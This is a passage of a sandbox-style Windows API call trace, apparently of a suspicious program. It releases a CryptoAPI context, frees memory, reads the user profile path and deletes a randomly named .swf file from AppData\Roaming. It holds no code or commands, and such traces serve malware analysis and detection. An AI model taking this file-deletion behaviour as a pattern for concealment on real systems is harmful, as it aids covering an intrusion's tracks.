lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0226.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.509] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0226.509] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0226.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0226.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.509] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0226.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0226.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0226.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.509] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0226.509] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.509] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0226.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.510] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0226.510] FreeLibrary (hLibModule=0x756e0000) returned 1 [0226.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0226.510] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0226.510] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.510] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0226.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0226.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0226.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0226.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0226.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0226.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0226.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0226.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.511] CloseHandle (hObject=0x2d0) returned 1 [0226.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0226.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0226.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0226.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0226.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0226.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0226.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0226.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0226.514] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0226.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0226.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0226.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0226.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0226.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0226.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.515] CloseHandle (hObject=0x2a0) returned 1 [0226.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0226.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0226.525] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0226.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0226.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0226.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0226.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0226.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0226.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0226.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0226.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0226.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0226.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0226.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0226.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0226.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0226.578] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0226.578] TranslateMessage (lpMsg=0x8cf968) returned 0 [0226.578] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0226.578] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0226.578] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0226.579] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0226.579] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0226.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0226.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0226.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0226.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0226.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x64) returned 0x2e564e0 [0226.579] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/BTjJSlc2bP-ki.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\BTjJSlc2bP-ki.swf", lpFilePart=0x8cedf4*="BTjJSlc2bP-ki.swf") returned 0x31 [0226.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0226.579] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\BTjJSlc2bP-ki.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\btjjslc2bp-ki.swf")) returned 0x20 [0226.580] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\BTjJSlc2bP-ki.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bbd63b0, ftCreationTime.dwHighDateTime=0x1d5e3da, ftLastAccessTime.dwLowDateTime=0x53cd0620, ftLastAccessTime.dwHighDateTime=0x1d5e411, ftLastWriteTime.dwLowDateTime=0x53cd0620, ftLastWriteTime.dwHighDateTime=0x1d5e411, nFileSizeHigh=0x0, nFileSizeLow=0x24f6, dwReserved0=0x1, dwReserved1=0x1c, cFileName="BTjJSlc2bP-ki.swf", cAlternateFileName="BTJJSL~1.SWF")) returned 0xa87110 [0226.580] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\BTjJSlc2bP-ki.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\btjjslc2bp-ki.swf")) returned 1 [0226.581] FindNextFileW (in: hFindFile=0xa87110, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bbd63b0, ftCreationTime.dwHighDateTime=0x1d5e3da, ftLastAccessTime.dwLowDateTime=0x53cd0620, ftLastAccessTime.dwHighDateTime=0x1d5e411, ftLastWriteTime.dwLowDateTime=0x53cd0620, ftLastWriteTime.dwHighDateTime=0x1d5e411, nFileSizeHigh=0x0, nFileSizeLow=0x24f6, dwReserved0=0x1, dwReserved1=0x1c, cFileName="BTjJSlc2bP-ki.swf", cAlternateFileName="BTJJSL~1.SWF")) returned 0 [0226.581] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0226.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0226.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.582] 